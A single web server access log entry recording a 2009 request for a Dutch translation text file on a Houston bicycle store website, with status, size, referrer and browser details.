38.100.41.113 - - [13/Jul/2009:01:14:25 -0700] "GET /translations/Dutch.txt HTTP/1.1" 200 28744 "http://www.bicyclestoreshouston.com/translations/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.bicyclestoreshouston.com"
